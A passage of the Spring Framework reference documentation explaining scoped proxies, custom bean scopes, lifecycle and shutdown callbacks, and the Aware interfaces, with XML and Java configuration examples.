Let's examine the\nfollowing singleton bean definition and contrast it with what you need to define for\nthe aforementioned scopes (note that the following `userPreferences` bean definition\nas it stands is __incomplete__).\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"userPreferences\" class=\"com.foo.UserPreferences\" scope=\"session\"\/>\n\n\t<bean id=\"userManager\" class=\"com.foo.UserManager\">\n\t\t<property name=\"userPreferences\" ref=\"userPreferences\"\/>\n\t<\/bean>\n----\n\nIn the preceding example, the singleton bean `userManager` is injected with a reference\nto the HTTP `Session`-scoped bean `userPreferences`. The salient point here is that the\n`userManager` bean is a singleton: it will be instantiated __exactly once__ per\ncontainer, and its dependencies (in this case only one, the `userPreferences` bean) are\nalso injected only once. This means that the `userManager` bean will only operate on the\nexact same `userPreferences` object, that is, the one that it was originally injected\nwith.\n\nThis is __not__ the behavior you want when injecting a shorter-lived scoped bean into a\nlonger-lived scoped bean, for example injecting an HTTP `Session`-scoped collaborating\nbean as a dependency into a singleton bean. Rather, you need a single `userManager`\nobject, and for the lifetime of an HTTP `Session`, you need a `userPreferences` object\nthat is specific to said HTTP `Session`. Thus the container creates an object that\nexposes the exact same public interface as the `UserPreferences` class (ideally an\nobject that __is a__ `UserPreferences` instance) which can fetch the real\n`UserPreferences` object from the scoping mechanism (HTTP request, `Session`, etc.). The\ncontainer injects this proxy object into the `userManager` bean, which is unaware that\nthis `UserPreferences` reference is a proxy. In this example, when a `UserManager`\ninstance invokes a method on the dependency-injected `UserPreferences` object, it\nis actually invoking a method on the proxy. The proxy then fetches the real\n`UserPreferences` object from (in this case) the HTTP `Session`, and delegates the\nmethod invocation onto the retrieved real `UserPreferences` object.\n\nThus you need the following (correct and complete) configuration when injecting\nrequest- and session-scoped beans into collaborating objects:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"userPreferences\" class=\"com.foo.UserPreferences\" scope=\"session\">\n\t\t<aop:scoped-proxy\/>\n\t<\/bean>\n\n\t<bean id=\"userManager\" class=\"com.foo.UserManager\">\n\t\t<property name=\"userPreferences\" ref=\"userPreferences\"\/>\n\t<\/bean>\n----\n\n[[beans-factory-scopes-other-injection-proxies]]\n===== Choosing the type of proxy to create\n\nBy default, when the Spring container creates a proxy for a bean that is marked up with\nthe `<aop:scoped-proxy\/>` element, __a CGLIB-based class proxy is created__.\n\n[NOTE]\n====\nCGLIB proxies only intercept public method calls! Do not call non-public methods\non such a proxy; they will not be delegated to the actual scoped target object.\n====\n\nAlternatively, you can configure the Spring container to create standard JDK\ninterface-based proxies for such scoped beans, by specifying `false` for the value of\nthe `proxy-target-class` attribute of the `<aop:scoped-proxy\/>` element. Using JDK\ninterface-based proxies means that you do not need additional libraries in your\napplication classpath to effect such proxying. 
However, it also means that the class of\nthe scoped bean must implement at least one interface, and __that all__ collaborators\ninto which the scoped bean is injected must reference the bean through one of its\ninterfaces.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<!-- DefaultUserPreferences implements the UserPreferences interface -->\n\t<bean id=\"userPreferences\" class=\"com.foo.DefaultUserPreferences\" scope=\"session\">\n\t\t<aop:scoped-proxy proxy-target-class=\"false\"\/>\n\t<\/bean>\n\n\t<bean id=\"userManager\" class=\"com.foo.UserManager\">\n\t\t<property name=\"userPreferences\" ref=\"userPreferences\"\/>\n\t<\/bean>\n----\n\nFor more detailed information about choosing class-based or interface-based proxying,\nsee <<aop-proxying>>.\n\n\n\n[[beans-factory-scopes-custom]]\n=== Custom scopes\n\nThe bean scoping mechanism is extensible: you can define your own\nscopes, or even redefine existing scopes, although the latter is considered bad practice\nand you __cannot__ override the built-in `singleton` and `prototype` scopes.\n\n\n[[beans-factory-scopes-custom-creating]]\n==== Creating a custom scope\n\nTo integrate your custom scope(s) into the Spring container, you need to implement the\n`org.springframework.beans.factory.config.Scope` interface, which is described in this\nsection. For an idea of how to implement your own scopes, see the `Scope`\nimplementations that are supplied with the Spring Framework itself and the\n{api-spring-framework}\/beans\/factory\/config\/Scope.html[`Scope` javadocs],\nwhich explain the methods you need to implement in more detail.\n\nThe `Scope` interface has four methods to get objects from the scope, remove them from\nthe scope, and allow them to be destroyed.\n\nThe following method returns the object from the underlying scope. The session scope\nimplementation, for example, returns the session-scoped bean (and if it does not exist,\nthe method returns a new instance of the bean, after having bound it to the session for\nfuture reference).\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tObject get(String name, ObjectFactory objectFactory)\n----\n\nThe following method removes the object from the underlying scope. The session scope\nimplementation, for example, removes the session-scoped bean from the underlying session.\nThe object should be returned, but you can return `null` if the object with the specified\nname is not found.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tObject remove(String name)\n----\n\nThe following method registers the callbacks the scope should execute when it is\ndestroyed or when the specified object in the scope is destroyed. Refer to the javadocs\nor a Spring scope implementation for more information on destruction callbacks.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tvoid registerDestructionCallback(String name, Runnable destructionCallback)\n----\n\nThe following method obtains the conversation identifier for the underlying scope. This\nidentifier is different for each scope. For a session-scoped implementation, this\nidentifier can be the session identifier.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tString getConversationId()\n----\n\n\n[[beans-factory-scopes-custom-using]]\n==== Using a custom scope\n\nAfter you write and test one or more custom `Scope` implementations, you need to make\nthe Spring container aware of your new scope(s). 
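\n\nFor orientation only, a deliberately naive sketch of such an implementation is shown\nbelow. The class name is invented, there is no per-conversation isolation, and\ndestruction callbacks are simply ignored, so this is a shape-of-the-contract\nillustration rather than a production-ready scope (note that the actual `Scope`\ninterface also declares `resolveContextualObject`):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport java.util.Map;\n\timport java.util.concurrent.ConcurrentHashMap;\n\n\timport org.springframework.beans.factory.ObjectFactory;\n\timport org.springframework.beans.factory.config.Scope;\n\n\tpublic class SimpleMapScope implements Scope {\n\n\t\tprivate final Map<String, Object> objects = new ConcurrentHashMap<String, Object>();\n\n\t\tpublic Object get(String name, ObjectFactory<?> objectFactory) {\n\t\t\t\/\/ create and cache the object on first access\n\t\t\tObject scopedObject = this.objects.get(name);\n\t\t\tif (scopedObject == null) {\n\t\t\t\tscopedObject = objectFactory.getObject();\n\t\t\t\tthis.objects.put(name, scopedObject);\n\t\t\t}\n\t\t\treturn scopedObject;\n\t\t}\n\n\t\tpublic Object remove(String name) {\n\t\t\treturn this.objects.remove(name);\n\t\t}\n\n\t\tpublic void registerDestructionCallback(String name, Runnable callback) {\n\t\t\t\/\/ destruction callbacks are ignored in this simplified sketch\n\t\t}\n\n\t\tpublic Object resolveContextualObject(String key) {\n\t\t\t\/\/ no contextual objects in this sketch\n\t\t\treturn null;\n\t\t}\n\n\t\tpublic String getConversationId() {\n\t\t\t\/\/ no meaningful conversation id for this sketch\n\t\t\treturn null;\n\t\t}\n\t}\n----\n\n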
The following method is the central\nmethod to register a new `Scope` with the Spring container:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tvoid registerScope(String scopeName, Scope scope);\n----\n\nThis method is declared on the `ConfigurableBeanFactory` interface, which is available\non most of the concrete `ApplicationContext` implementations that ship with Spring via\nthe BeanFactory property.\n\nThe first argument to the `registerScope(..)` method is the unique name associated with\na scope; examples of such names in the Spring container itself are `singleton` and\n`prototype`. The second argument to the `registerScope(..)` method is an actual instance\nof the custom `Scope` implementation that you wish to register and use.\n\nSuppose that you write your custom `Scope` implementation, and then register it as below.\n\n[NOTE]\n====\nThe example below uses `SimpleThreadScope` which is included with Spring, but not\nregistered by default. The instructions would be the same for your own custom `Scope`\nimplementations.\n====\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tScope threadScope = new SimpleThreadScope();\n\tbeanFactory.registerScope(\"thread\", threadScope);\n----\n\nYou then create bean definitions that adhere to the scoping rules of your custom `Scope`:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"...\" class=\"...\" scope=\"thread\">\n----\n\nWith a custom `Scope` implementation, you are not limited to programmatic registration\nof the scope. You can also do the `Scope` registration declaratively, using the\n`CustomScopeConfigurer` class:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:aop=\"http:\/\/www.springframework.org\/schema\/aop\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/aop\n\t\t\thttp:\/\/www.springframework.org\/schema\/aop\/spring-aop.xsd\">\n\n\t\t<bean class=\"org.springframework.beans.factory.config.CustomScopeConfigurer\">\n\t\t\t<property name=\"scopes\">\n\t\t\t\t<map>\n\t\t\t\t\t<entry key=\"thread\">\n\t\t\t\t\t\t<bean class=\"org.springframework.context.support.SimpleThreadScope\"\/>\n\t\t\t\t\t<\/entry>\n\t\t\t\t<\/map>\n\t\t\t<\/property>\n\t\t<\/bean>\n\n\t\t<bean id=\"bar\" class=\"x.y.Bar\" scope=\"thread\">\n\t\t\t<property name=\"name\" value=\"Rick\"\/>\n\t\t\t<aop:scoped-proxy\/>\n\t\t<\/bean>\n\n\t\t<bean id=\"foo\" class=\"x.y.Foo\">\n\t\t\t<property name=\"bar\" ref=\"bar\"\/>\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\n[NOTE]\n====\nWhen you place `<aop:scoped-proxy\/>` in a `FactoryBean` implementation, it is the factory\nbean itself that is scoped, not the object returned from `getObject()`.\n====\n\n\n\n\n[[beans-factory-nature]]\n== Customizing the nature of a bean\n\n\n\n[[beans-factory-lifecycle]]\n=== Lifecycle callbacks\n\nTo interact with the container's management of the bean lifecycle, you can implement the\nSpring `InitializingBean` and `DisposableBean` interfaces. 
The container calls\n`afterPropertiesSet()` for the former and `destroy()` for the latter to allow the bean\nto perform certain actions upon initialization and destruction of your beans.\n\n[TIP]\n====\nThe JSR-250 `@PostConstruct` and `@PreDestroy` annotations are generally considered best\npractice for receiving lifecycle callbacks in a modern Spring application. Using these\nannotations means that your beans are not coupled to Spring specific interfaces. For\ndetails see <<beans-postconstruct-and-predestroy-annotations>>.\n\nIf you don't want to use the JSR-250 annotations but you are still looking to remove\ncoupling consider the use of init-method and destroy-method object definition metadata.\n====\n\nInternally, the Spring Framework uses `BeanPostProcessor` implementations to process any\ncallback interfaces it can find and call the appropriate methods. If you need custom\nfeatures or other lifecycle behavior Spring does not offer out-of-the-box, you can\nimplement a `BeanPostProcessor` yourself. For more information, see\n<<beans-factory-extension>>.\n\nIn addition to the initialization and destruction callbacks, Spring-managed objects may\nalso implement the `Lifecycle` interface so that those objects can participate in the\nstartup and shutdown process as driven by the container's own lifecycle.\n\nThe lifecycle callback interfaces are described in this section.\n\n\n[[beans-factory-lifecycle-initializingbean]]\n==== Initialization callbacks\n\nThe `org.springframework.beans.factory.InitializingBean` interface allows a bean to\nperform initialization work after all necessary properties on the bean have been set by\nthe container. The `InitializingBean` interface specifies a single method:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tvoid afterPropertiesSet() throws Exception;\n----\n\nIt is recommended that you do not use the `InitializingBean` interface because it\nunnecessarily couples the code to Spring. Alternatively, use\nthe <<beans-postconstruct-and-predestroy-annotations, `@PostConstruct`>> annotation or\nspecify a POJO initialization method. In the case of XML-based configuration metadata,\nyou use the `init-method` attribute to specify the name of the method that has a void\nno-argument signature. With Java config, you use the `initMethod` attribute of `@Bean`,\nsee <<beans-java-lifecycle-callbacks>>. For example, the following:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleInitBean\" class=\"examples.ExampleBean\" init-method=\"init\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class ExampleBean {\n\n\t\tpublic void init() {\n\t\t\t\/\/ do some initialization work\n\t\t}\n\n\t}\n----\n\n...is exactly the same as...\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleInitBean\" class=\"examples.AnotherExampleBean\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class AnotherExampleBean implements InitializingBean {\n\n\t\tpublic void afterPropertiesSet() {\n\t\t\t\/\/ do some initialization work\n\t\t}\n\n\t}\n----\n\nbut does not couple the code to Spring.\n\n\n[[beans-factory-lifecycle-disposablebean]]\n==== Destruction callbacks\n\nImplementing the `org.springframework.beans.factory.DisposableBean` interface allows a\nbean to get a callback when the container containing it is destroyed. 
The\n`DisposableBean` interface specifies a single method:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tvoid destroy() throws Exception;\n----\n\nIt is recommended that you do not use the `DisposableBean` callback interface because it\nunnecessarily couples the code to Spring. Alternatively, use\nthe <<beans-postconstruct-and-predestroy-annotations, `@PreDestroy`>> annotation or\nspecify a generic method that is supported by bean definitions. With XML-based\nconfiguration metadata, you use the `destroy-method` attribute on the `<bean\/>` element.\nWith Java config, you use the `destroyMethod` attribute of `@Bean`; see\n<<beans-java-lifecycle-callbacks>>. For example, the following definition:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleInitBean\" class=\"examples.ExampleBean\" destroy-method=\"cleanup\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class ExampleBean {\n\n\t\tpublic void cleanup() {\n\t\t\t\/\/ do some destruction work (like releasing pooled connections)\n\t\t}\n\n\t}\n----\n\nis exactly the same as:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleInitBean\" class=\"examples.AnotherExampleBean\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class AnotherExampleBean implements DisposableBean {\n\n\t\tpublic void destroy() {\n\t\t\t\/\/ do some destruction work (like releasing pooled connections)\n\t\t}\n\n\t}\n----\n\nbut does not couple the code to Spring.\n\n[TIP]\n====\nThe `destroy-method` attribute of a `<bean>` element can be assigned a special\n`(inferred)` value which instructs Spring to automatically detect a public `close` or\n`shutdown` method on the specific bean class (any class that implements\n`java.lang.AutoCloseable` or `java.io.Closeable` would therefore match). This special\n`(inferred)` value can also be set on the `default-destroy-method` attribute of a\n`<beans>` element to apply this behavior to an entire set of beans (see\n<<beans-factory-lifecycle-default-init-destroy-methods>>). Note that this is the\ndefault behavior with Java config.\n====\n\n[[beans-factory-lifecycle-default-init-destroy-methods]]\n==== Default initialization and destroy methods\n\nWhen you write initialization and destroy method callbacks that do not use the\nSpring-specific `InitializingBean` and `DisposableBean` callback interfaces, you\ntypically write methods with names such as `init()`, `initialize()`, `dispose()`, and so\non. Ideally, the names of such lifecycle callback methods are standardized across a\nproject so that all developers use the same method names and ensure consistency.\n\nYou can configure the Spring container to look for named initialization and destroy\ncallback methods on __every__ bean. This means that you, as an application\ndeveloper, can write your application classes and use an initialization callback called\n`init()`, without having to configure an `init-method=\"init\"` attribute with each bean\ndefinition. The Spring IoC container calls that method when the bean is created (and in\naccordance with the standard lifecycle callback contract described previously). This\nfeature also enforces a consistent naming convention for initialization and destroy\nmethod callbacks.\n\nSuppose that your initialization callback methods are named `init()` and destroy\ncallback methods are named `destroy()`. 
Your class will resemble the class in the\nfollowing example.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class DefaultBlogService implements BlogService {\n\n\t\tprivate BlogDao blogDao;\n\n\t\tpublic void setBlogDao(BlogDao blogDao) {\n\t\t\tthis.blogDao = blogDao;\n\t\t}\n\n\t\t\/\/ this is (unsurprisingly) the initialization callback method\n\t\tpublic void init() {\n\t\t\tif (this.blogDao == null) {\n\t\t\t\tthrow new IllegalStateException(\"The [blogDao] property must be set.\");\n\t\t\t}\n\t\t}\n\n\t}\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans default-init-method=\"init\">\n\n\t\t<bean id=\"blogService\" class=\"com.foo.DefaultBlogService\">\n\t\t\t<property name=\"blogDao\" ref=\"blogDao\" \/>\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\nThe presence of the `default-init-method` attribute on the top-level `<beans\/>` element\ncauses the Spring IoC container to recognize a method called `init` on beans\nas the initialization method callback. When a bean is created and assembled, if the bean\nclass has such a method, it is invoked at the appropriate time.\n\nYou configure destroy method callbacks similarly (in XML, that is) by using the\n`default-destroy-method` attribute on the top-level `<beans\/>` element.\n\nWhere existing bean classes already have callback methods that are named at variance\nwith the convention, you can override the default by specifying (in XML, that is) the\nmethod name using the `init-method` and `destroy-method` attributes of the `<bean\/>`\nitself.\n\nThe Spring container guarantees that a configured initialization callback is called\nimmediately after a bean is supplied with all dependencies. Thus the initialization\ncallback is called on the raw bean reference, which means that AOP interceptors and so\nforth are not yet applied to the bean. A target bean is fully created __first__,\n__then__ an AOP proxy (for example) with its interceptor chain is applied. If the target\nbean and the proxy are defined separately, your code can even interact with the raw\ntarget bean, bypassing the proxy. Hence, it would be inconsistent to apply the\ninterceptors to the init method, because doing so would couple the lifecycle of the\ntarget bean with its proxy\/interceptors and leave strange semantics when your code\ninteracts directly with the raw target bean.\n\n\n[[beans-factory-lifecycle-combined-effects]]\n==== Combining lifecycle mechanisms\n\nAs of Spring 2.5, you have three options for controlling bean lifecycle behavior: the\n<<beans-factory-lifecycle-initializingbean, `InitializingBean`>> and\n<<beans-factory-lifecycle-disposablebean, `DisposableBean`>> callback interfaces; custom\n`init()` and `destroy()` methods; and the\n<<beans-postconstruct-and-predestroy-annotations, `@PostConstruct` and `@PreDestroy`\nannotations>>. You can combine these mechanisms to control a given bean.\n\n[NOTE]\n====\nIf multiple lifecycle mechanisms are configured for a bean, and each mechanism is\nconfigured with a different method name, then each configured method is executed in the\norder listed below. 
However, if the same method name is configured - for example,\n`init()` for an initialization method - for more than one of these lifecycle mechanisms,\nthat method is executed once, as explained in the preceding section.\n====\n\nMultiple lifecycle mechanisms configured for the same bean, with different\ninitialization methods, are called as follows:\n\n* Methods annotated with `@PostConstruct`\n* `afterPropertiesSet()` as defined by the `InitializingBean` callback interface\n* A custom configured `init()` method\n\nDestroy methods are called in the same order:\n\n* Methods annotated with `@PreDestroy`\n* `destroy()` as defined by the `DisposableBean` callback interface\n* A custom configured `destroy()` method\n\n\n[[beans-factory-lifecycle-processor]]\n==== Startup and shutdown callbacks\n\nThe `Lifecycle` interface defines the essential methods for any object that has its own\nlifecycle requirements (e.g. starts and stops some background process):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic interface Lifecycle {\n\n\t\tvoid start();\n\n\t\tvoid stop();\n\n\t\tboolean isRunning();\n\n\t}\n----\n\nAny Spring-managed object may implement that interface. Then, when the\n`ApplicationContext` itself receives start and stop signals, e.g. for a stop\/restart\nscenario at runtime, it will cascade those calls to all `Lifecycle` implementations\ndefined within that context. It does this by delegating to a `LifecycleProcessor`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic interface LifecycleProcessor extends Lifecycle {\n\n\t\tvoid onRefresh();\n\n\t\tvoid onClose();\n\n\t}\n----\n\nNotice that the `LifecycleProcessor` is itself an extension of the `Lifecycle`\ninterface. It also adds two other methods for reacting to the context being refreshed\nand closed.\n\n[TIP]\n====\nNote that the regular `org.springframework.context.Lifecycle` interface is just a plain\ncontract for explicit start\/stop notifications and does NOT imply auto-startup at context\nrefresh time. Consider implementing `org.springframework.context.SmartLifecycle` instead\nfor fine-grained control over auto-startup of a specific bean (including startup phases).\nAlso, please note that stop notifications are not guaranteed to come before destruction:\nOn regular shutdown, all `Lifecycle` beans will first receive a stop notification before\nthe general destruction callbacks are being propagated; however, on hot refresh during a\ncontext's lifetime or on aborted refresh attempts, only destroy methods will be called.\n====\n\nThe order of startup and shutdown invocations can be important. If a \"depends-on\"\nrelationship exists between any two objects, the dependent side will start __after__ its\ndependency, and it will stop __before__ its dependency. However, at times the direct\ndependencies are unknown. You may only know that objects of a certain type should start\nprior to objects of another type. 
In those cases, the `SmartLifecycle` interface defines\nanother option, namely the `getPhase()` method as defined on its super-interface,\n`Phased`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic interface Phased {\n\n\t\tint getPhase();\n\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic interface SmartLifecycle extends Lifecycle, Phased {\n\n\t\tboolean isAutoStartup();\n\n\t\tvoid stop(Runnable callback);\n\n\t}\n----\n\nWhen starting, the objects with the lowest phase start first, and when stopping, the\nreverse order is followed. Therefore, an object that implements `SmartLifecycle` and\nwhose `getPhase()` method returns `Integer.MIN_VALUE` would be among the first to start\nand the last to stop. At the other end of the spectrum, a phase value of\n`Integer.MAX_VALUE` would indicate that the object should be started last and stopped\nfirst (likely because it depends on other processes to be running). When considering the\nphase value, it's also important to know that the default phase for any \"normal\"\n`Lifecycle` object that does not implement `SmartLifecycle` would be 0. Therefore, any\nnegative phase value would indicate that an object should start before those standard\ncomponents (and stop after them), and vice versa for any positive phase value.\n\nAs you can see, the stop method defined by `SmartLifecycle` accepts a callback. Any\nimplementation __must__ invoke that callback's `run()` method after that implementation's\nshutdown process is complete. That enables asynchronous shutdown where necessary since\nthe default implementation of the `LifecycleProcessor` interface,\n`DefaultLifecycleProcessor`, will wait up to its timeout value for the group of objects\nwithin each phase to invoke that callback. The default per-phase timeout is 30 seconds.\nYou can override the default lifecycle processor instance by defining a bean named\n\"lifecycleProcessor\" within the context. If you only want to modify the timeout, then\ndefining the following would be sufficient:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"lifecycleProcessor\" class=\"org.springframework.context.support.DefaultLifecycleProcessor\">\n\t\t<!-- timeout value in milliseconds -->\n\t\t<property name=\"timeoutPerShutdownPhase\" value=\"10000\"\/>\n\t<\/bean>\n----\n\nAs mentioned, the `LifecycleProcessor` interface defines callback methods for the\nrefreshing and closing of the context as well. The latter will simply drive the shutdown\nprocess as if `stop()` had been called explicitly, but it will happen when the context is\nclosing. The 'refresh' callback on the other hand enables another feature of\n`SmartLifecycle` beans. When the context is refreshed (after all objects have been\ninstantiated and initialized), that callback will be invoked, and at that point the\ndefault lifecycle processor will check the boolean value returned by each\n`SmartLifecycle` object's `isAutoStartup()` method. If \"true\", then that object will be\nstarted at that point rather than waiting for an explicit invocation of the context's or\nits own `start()` method (unlike the context refresh, the context start does not happen\nautomatically for a standard context implementation). 
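\n\nFor illustration only, the following is a minimal sketch of a `SmartLifecycle`\nimplementation; the background receiver that it claims to manage is a hypothetical\ncollaborator, not part of the Spring API.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport org.springframework.context.SmartLifecycle;\n\n\tpublic class ReceiverLifecycleBean implements SmartLifecycle {\n\n\t\tprivate volatile boolean running = false;\n\n\t\tpublic boolean isAutoStartup() {\n\t\t\treturn true; \/\/ start automatically when the context is refreshed\n\t\t}\n\n\t\tpublic void start() {\n\t\t\t\/\/ start the (hypothetical) background receiver here\n\t\t\tthis.running = true;\n\t\t}\n\n\t\tpublic void stop() {\n\t\t\t\/\/ stop the background receiver here\n\t\t\tthis.running = false;\n\t\t}\n\n\t\tpublic void stop(Runnable callback) {\n\t\t\tstop();\n\t\t\t\/\/ signal completion so that the DefaultLifecycleProcessor\n\t\t\t\/\/ does not wait for the per-phase timeout\n\t\t\tcallback.run();\n\t\t}\n\n\t\tpublic boolean isRunning() {\n\t\t\treturn this.running;\n\t\t}\n\n\t\tpublic int getPhase() {\n\t\t\treturn Integer.MAX_VALUE; \/\/ start last, stop first\n\t\t}\n\n\t}\n----\n\n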
The \"phase\" value as well as any\n\"depends-on\" relationships will determine the startup order in the same way as described\nabove.\n\n\n[[beans-factory-shutdown]]\n==== Shutting down the Spring IoC container gracefully in non-web applications\n\n[NOTE]\n====\nThis section applies only to non-web applications. Spring's web-based\n`ApplicationContext` implementations already have code in place to shut down the Spring\nIoC container gracefully when the relevant web application is shut down.\n====\n\nIf you are using Spring's IoC container in a non-web application environment; for\nexample, in a rich client desktop environment; you register a shutdown hook with the\nJVM. Doing so ensures a graceful shutdown and calls the relevant destroy methods on your\nsingleton beans so that all resources are released. Of course, you must still configure\nand implement these destroy callbacks correctly.\n\nTo register a shutdown hook, you call the `registerShutdownHook()` method that is\ndeclared on the `ConfigurableApplicationContext` interface:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport org.springframework.context.ConfigurableApplicationContext;\n\timport org.springframework.context.support.ClassPathXmlApplicationContext;\n\n\tpublic final class Boot {\n\n\t\tpublic static void main(final String[] args) throws Exception {\n\n\t\t\tConfigurableApplicationContext ctx = new ClassPathXmlApplicationContext(\n\t\t\t\t\tnew String []{\"beans.xml\"});\n\n\t\t\t\/\/ add a shutdown hook for the above context...\n\t\t\tctx.registerShutdownHook();\n\n\t\t\t\/\/ app runs here...\n\n\t\t\t\/\/ main method exits, hook is called prior to the app shutting down...\n\n\t\t}\n\t}\n----\n\n\n\n[[beans-factory-aware]]\n=== ApplicationContextAware and BeanNameAware\n\nWhen an `ApplicationContext` creates an object instance that implements the\n`org.springframework.context.ApplicationContextAware` interface, the instance is provided\nwith a reference to that `ApplicationContext`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic interface ApplicationContextAware {\n\n\t\tvoid setApplicationContext(ApplicationContext applicationContext) throws BeansException;\n\n\t}\n----\n\nThus beans can manipulate programmatically the `ApplicationContext` that created them,\nthrough the `ApplicationContext` interface, or by casting the reference to a known\nsubclass of this interface, such as `ConfigurableApplicationContext`, which exposes\nadditional functionality. One use would be the programmatic retrieval of other beans.\nSometimes this capability is useful; however, in general you should avoid it, because it\ncouples the code to Spring and does not follow the Inversion of Control style, where\ncollaborators are provided to beans as properties. Other methods of the\n`ApplicationContext` provide access to file resources, publishing application events, and\naccessing a `MessageSource`. These additional features are described in\n<<context-introduction>>\n\nAs of Spring 2.5, autowiring is another alternative to obtain reference to the\n`ApplicationContext`. The \"traditional\" `constructor` and `byType` autowiring modes (as\ndescribed in <<beans-factory-autowire>>) can provide a dependency of type\n`ApplicationContext` for a constructor argument or setter method parameter,\nrespectively. For more flexibility, including the ability to autowire fields and\nmultiple parameter methods, use the new annotation-based autowiring features. 
If you do,\nthe `ApplicationContext` is autowired into a field, constructor argument, or method\nparameter that is expecting the `ApplicationContext` type if the field, constructor, or\nmethod in question carries the `@Autowired` annotation. For more information, see\n<<beans-autowired-annotation>>.\n\nWhen an `ApplicationContext` creates a bean that implements the\n`org.springframework.beans.factory.BeanNameAware` interface, the bean is provided with\na reference to the name defined in its associated object definition.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic interface BeanNameAware {\n\n\t\tvoid setBeanName(String name) throws BeansException;\n\n\t}\n----\n\nThe callback is invoked after population of normal bean properties but before an\ninitialization callback such as `InitializingBean` __afterPropertiesSet__ or a custom\ninit-method.\n\n\n\n[[aware-list]]\n=== Other Aware interfaces\n\nBesides `ApplicationContextAware` and `BeanNameAware` discussed above, Spring offers a\nrange of `Aware` interfaces that allow beans to indicate to the container that they\nrequire a certain __infrastructure__ dependency. The most important `Aware` interfaces\nare summarized below - as a general rule, the name is a good indication of the\ndependency type:\n\n[[beans-factory-nature-aware-list]]\n.Aware interfaces\n|===\n| Name| Injected Dependency| Explained in...\n\n| `ApplicationContextAware`\n| Declaring `ApplicationContext`\n| <<beans-factory-aware>>\n\n| `ApplicationEventPublisherAware`\n| Event publisher of the enclosing `ApplicationContext`\n| <<context-introduction>>\n\n| `BeanClassLoaderAware`\n| Class loader used to load the bean classes.\n| <<beans-factory-class>>\n\n| `BeanFactoryAware`\n| Declaring `BeanFactory`\n| <<beans-factory-aware>>\n\n| `BeanNameAware`\n| Name of the declaring bean\n| <<beans-factory-aware>>\n\n| `BootstrapContextAware`\n| Resource adapter `BootstrapContext` the container runs in. Typically available only in\n JCA aware ``ApplicationContext``s\n| <<cci>>\n\n| `LoadTimeWeaverAware`\n| Defined __weaver__ for processing class definition at load time\n| <<aop-aj-ltw>>\n\n| `MessageSourceAware`\n| Configured strategy for resolving messages (with support for parametrization and\n internationalization)\n| <<context-introduction>>\n\n| `NotificationPublisherAware`\n| Spring JMX notification publisher\n| <<jmx-notifications>>\n\n| `ResourceLoaderAware`\n| Configured loader for low-level access to resources\n| <<resources>>\n\n| `ServletConfigAware`\n| Current `ServletConfig` the container runs in. Valid only in a web-aware Spring\n `ApplicationContext`\n| <<mvc>>\n\n| `ServletContextAware`\n| Current `ServletContext` the container runs in. Valid only in a web-aware Spring\n `ApplicationContext`\n| <<mvc>>\n|===\n\nNote again that usage of these interfaces ties your code to the Spring API and does not\nfollow the Inversion of Control style. As such, they are recommended for infrastructure\nbeans that require programmatic access to the container.\n\n\n\n\n[[beans-child-bean-definitions]]\n== Bean definition inheritance\nA bean definition can contain a lot of configuration information, including constructor\narguments, property values, and container-specific information such as initialization\nmethod, static factory method name, and so on. A child bean definition inherits\nconfiguration data from a parent definition. The child definition can override some\nvalues, or add others, as needed. 
